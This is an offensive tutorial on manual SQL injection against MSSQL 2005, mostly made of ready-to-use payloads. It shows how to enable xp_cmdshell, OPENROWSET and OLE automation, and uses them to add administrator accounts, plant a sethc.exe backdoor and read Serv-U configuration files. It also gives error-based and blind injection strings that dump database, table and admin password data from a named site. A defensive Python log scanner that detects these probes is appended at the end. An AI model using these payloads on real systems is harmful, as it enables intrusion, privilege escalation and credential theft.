
An in-depth look at manual blind injection against MSSQL 2005 databases

I. Enabling extended functionality

1. Enabling xp_cmdshell

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

Disabling xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;--

dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
(registers xplog70.dll)

2. Enabling 'OPENROWSET'
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;--

Executing select * from openrowset('microsoft.jet.oledb.4.0','
;database=c:/windows/system32/ias/ias.mdb',
'select shell("cmd.exe /c net user admin admin1234 /add")') in Query Analyzer uses the Jet sandbox mode to add an administrator account.

3. Enabling 'sp_oacreate'
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;--

Copy the file d:/windows/explorer.exe to sethc.exe:
declare @o int;exec sp_oacreate 'scripting.filesystemobject', @o out ;exec sp_oamethod @o, 'copyfile',null,'d:/windows/explorer.exe' ,'c:/sethc.exe';

Execute in Query Analyzer:
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD
@shell,'run',null, 'C:/WINdows/system32/cmd.exe /c net user xcode xcode /add'
This code uses SP_OAcreate to add a system user named xcode and then promotes it directly to administrator rights.

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:/Serv-U6.3/ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
This code prints out all of the configuration information stored in ServUDaemon.ini.

II. With error messages displayed: dumping data through errors

and 0<(select count(*) from master.dbo.sysdatabases);-- binary search to obtain the number of databases

and 0<(select count(*) from master.dbo.sysdatabases where name>1 and dbid=1);-- submit dbid = 2, 3, 4, ... in turn to obtain the remaining databases

and 0<(select count(*) name from employ.dbo.sysobjects where xtype='U');-- binary search to obtain the number of tables (assuming the dumped database name is employ)

and 0<(select top 1 name from employ.dbo.sysobjects where xtype='U');-- dumps one table name

Assuming the dumped table name is "employ_qj", add the condition and name not in ('employ_qj') to the statement above, and keep adding conditions in the same way...

and 0<(select top 1 name from syscolumns where id in (select id from sysobjects where type = 'u' and name = 'employ_qj'));-- dumps one column name

Assuming the dumped column name is "id", add the condition and name not in ('id') to the statement above, and keep adding conditions in the same way...

Alternatively:

Statement to dump database names
and (select top 1 isnull(cast([name] as nvarchar(500)),char(32))+char(124) from [master].[dbo].[sysdatabases] where dbid in (select top N dbid from [master].[dbo].[sysdatabases] order by dbid desc))=0--

Statement to dump table names; the somedb part is the database whose tables are to be listed
and (select top 1 cast(name as varchar(200)) from (select top N name from somedb.sys.all_objects where type=char(85) order by name) t order by name desc)=0--

Statement to dump a field; this dumps the password field of the admin table where user='admin'
And (Select Top 1 isNull(cast([password] as varchar(2000)),char(32))+char(124) From (Select Top N [password] From [somedb]..[admin] Where user='admin' Order by [password]) T Order by [password]Desc)=0--

III. Without error messages: blind injection

First, the query methods used in SQL 2005:

select * from master.dbo.sysdatabases                -- list the databases

select * from NetBook.dbo.sysobjects where xtype='u'    -- list the tables in database NetBook

select * from NetBook.dbo.syscolumns where id=object_id('book') -- list the fields in table book

Determining privileges:
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
and 1=(select IS_SRVROLEMEMBER('serveradmin'))
and 1=(select IS_SRVROLEMEMBER('setupadmin'))
and 1=(select IS_SRVROLEMEMBER('securityadmin'))
and 1=(select IS_SRVROLEMEMBER('diskadmin'))
and 1=(select IS_SRVROLEMEMBER('bulkadmin'))
and 1=(select IS_SRVROLEMEMBER('db_owner')) -- db_owner is a database role, not a server role, so IS_SRVROLEMEMBER returns NULL for it

Standard blind injection steps:

Determine whether the database really is MSSQL 2005:
http://www.oldjun.com/oldjun.aspx?id=1 and substring((select @@version),22,4)='2005'

Guess the database name:

First guess the dbid:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5)=1
Guess the database name from its dbid, starting with its length:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=12)=1
Then guess it one character at a time:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and ascii(substring(name,1,1))>90)=1

Guess table names (assuming the database name has already been found to be database):

You can first test whether an admin table exists:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where xtype='u' and name like '%admin%')=1
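From the defender's side, the probes above leave distinctive traces in web-server access logs. The following Python script is an added example, not part of the original article: it decodes request paths from constructed Combined Log Format lines, flags the fingerprinting, catalog-enumeration, role-check and extended-procedure patterns this article uses, and counts probes per source address. The log lines, IP addresses and the pattern names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Probe signatures drawn from the techniques in this article: @@version fingerprinting,
# sysdatabases/sysobjects/syscolumns enumeration, IS_SRVROLEMEMBER checks, character-by-character
# guessing with ascii(substring(...)), and the extended procedures the article enables.
MSSQL_PROBE_PATTERNS = {
    "version_fingerprint": re.compile(r"@@version", re.I),
    "catalog_enum": re.compile(r"\b(sysdatabases|sysobjects|syscolumns|all_objects)\b", re.I),
    "role_check": re.compile(r"is_srvrolemember\s*\(", re.I),
    "char_guess": re.compile(r"ascii\s*\(\s*substring\s*\(", re.I),
    "ext_proc": re.compile(r"\b(xp_cmdshell|sp_oacreate|sp_oamethod|openrowset|sp_configure)\b", re.I),
}

# Combined Log Format: ip ident user [time] "method path proto" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def classify_request(path: str) -> list:
    """Return the probe pattern names found in a URL-decoded request path (empty list if clean)."""
    decoded = unquote_plus(path)
    return [name for name, rx in MSSQL_PROBE_PATTERNS.items() if rx.search(decoded)]

def scan_access_log(lines) -> list:
    """Return (ip, path, matched_patterns) for every request that trips at least one pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        tags = classify_request(m.group("path"))
        if tags:
            hits.append((m.group("ip"), m.group("path"), tags))
    return hits

def probes_per_source(hits) -> dict:
    """Count flagged requests per source IP; blind injection produces many probes from one source."""
    counts = {}
    for ip, _path, _tags in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts

# Constructed sample log lines; the payloads mirror the probes shown in this article.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2019:13:55:36 +0000] "GET /oldjun.aspx?id=1 HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2019:13:55:37 +0000] "GET /oldjun.aspx?id=1%20and%20substring((select%20@@version),22,4)=%272005%27 HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2019:13:55:38 +0000] "GET /oldjun.aspx?id=1%20and%20(select%20count(*)%20from%20master.dbo.sysdatabases%20where%20dbid=5%20and%20ascii(substring(name,1,1))>90)=1 HTTP/1.1" 200 512',
    '198.51.100.2 - - [10/Oct/2019:13:56:01 +0000] "GET /oldjun.aspx?id=1%20and%201=(select%20IS_SRVROLEMEMBER(%27sysadmin%27)) HTTP/1.1" 200 512',
    '198.51.100.2 - - [10/Oct/2019:13:56:02 +0000] "GET /search.aspx?q=version+history HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, path, tags in scan_access_log(SAMPLE_LOG):
        print(ip, tags, path)
    print(probes_per_source(scan_access_log(SAMPLE_LOG)))
```

Because each blind-injection step needs one request per bit of information, the per-source count rises quickly and is a better alert threshold than any single pattern match.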
